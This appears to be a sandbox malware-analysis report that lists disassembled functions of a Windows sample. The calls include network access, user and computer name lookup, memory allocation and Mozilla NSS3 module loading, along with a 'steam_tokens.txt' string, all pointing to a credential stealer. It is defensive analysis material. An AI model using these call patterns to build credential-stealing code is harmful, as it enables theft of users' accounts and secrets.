Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,041431B0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,041434C0), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 0e3b4742804874a780a066254cb668122dfdc385ba13d8aa658f83288e45540c
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 0e3b4742804874a780a066254cb668122dfdc385ba13d8aa658f83288e45540c
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,041434C0), ref: 00404ED9

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: a6a78ff70d27b61a9f6037f1a30da5da91f984a2f7bb54771162fbb6bc8815ef
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: a6a78ff70d27b61a9f6037f1a30da5da91f984a2f7bb54771162fbb6bc8815ef
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,041434C0), ref: 00404ED9

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,041434C0), ref: 00404ED9

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,04148B20), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04143330,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6CE26E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CF72120,6CE27E60), ref: 6CE26EBC
TlsGetValue.KERNEL32 ref: 6CE26EDF
EnterCriticalSection.KERNEL32(?), ref: 6CE26EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6CE26F25

Part of subcall function 6CDFA900: TlsGetValue.KERNEL32(00000000,?,6CF714E4,?,6CD94DD9), ref: 6CDFA90F
Part of subcall function 6CDFA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CDFA94F

PR_Unlock.NSS3 ref: 6CE26F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6CE26FA9
TlsGetValue.KERNEL32 ref: 6CE270B4
EnterCriticalSection.KERNEL32(?), ref: 6CE270C8
PR_CallOnce.NSS3(6CF724C0,6CE67590), ref: 6CE27104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE27117
SECOID_Init.NSS3 ref: 6CE27128
PORT_Alloc_Util.NSS3(00000057), ref: 6CE2714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE2717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE271A9
PR_NotifyAllCondVar.NSS3 ref: 6CE271CF
PR_Unlock.NSS3 ref: 6CE271DD
free.MOZGLUE(?), ref: 6CE271EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE27208
free.MOZGLUE(00000000), ref: 6CE27221
free.MOZGLUE(00000001), ref: 6CE27235
TlsGetValue.KERNEL32 ref: 6CE2724A
EnterCriticalSection.KERNEL32(?), ref: 6CE2725E
PR_NotifyCondVar.NSS3 ref: 6CE27273
PR_Unlock.NSS3 ref: 6CE27281
SECMOD_DestroyModule.NSS3(00000000), ref: 6CE27291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE272B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE272D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE272E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE27301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE27310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE27335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE27344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE27363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE27372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CF60148,,defaultModDB,internalKeySlot), ref: 6CE274CC
free.MOZGLUE(00000000), ref: 6CE27513
free.MOZGLUE(00000000), ref: 6CE2751B
free.MOZGLUE(00000000), ref: 6CE27528
free.MOZGLUE(00000000), ref: 6CE2753C
free.MOZGLUE(00000000), ref: 6CE27550
free.MOZGLUE(00000000), ref: 6CE27561
free.MOZGLUE(00000000), ref: 6CE27572
free.MOZGLUE(00000000), ref: 6CE27583
free.MOZGLUE(00000000), ref: 6CE27594
free.MOZGLUE(00000000), ref: 6CE275A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CE275BD
free.MOZGLUE(00000000), ref: 6CE275C8
free.MOZGLUE(00000000), ref: 6CE275F1
PR_NewLock.NSS3 ref: 6CE27636
SECMOD_DestroyModule.NSS3(00000000), ref: 6CE27686
PR_NewLock.NSS3 ref: 6CE276A2

Part of subcall function 6CED98D0: calloc.MOZGLUE(00000001,00000084,6CE00936,00000001,?,6CE0102C), ref: 6CED98E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6CE276B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CE27707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CE2771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CE27731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CE2774A
DeleteCriticalSection.KERNEL32(?), ref: 6CE27770
free.MOZGLUE(?), ref: 6CE27779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE2779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE277AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6CE277C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE277DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6CE27821
PORT_Alloc_Util.NSS3(?), ref: 6CE27837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CE2785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE2786F
SECMOD_AddNewModuleEx.NSS3 ref: 6CE278AC
free.MOZGLUE(00000000), ref: 6CE278BE
SECMOD_AddNewModuleEx.NSS3 ref: 6CE278F3
free.MOZGLUE(00000000), ref: 6CE278FC
free.MOZGLUE(00000000), ref: 6CE2791C

Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007AD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007CD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007D6
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CD9204A), ref: 6CE007E4
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,6CD9204A), ref: 6CE00864
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE00880
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,6CD9204A), ref: 6CE008CB
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008D7
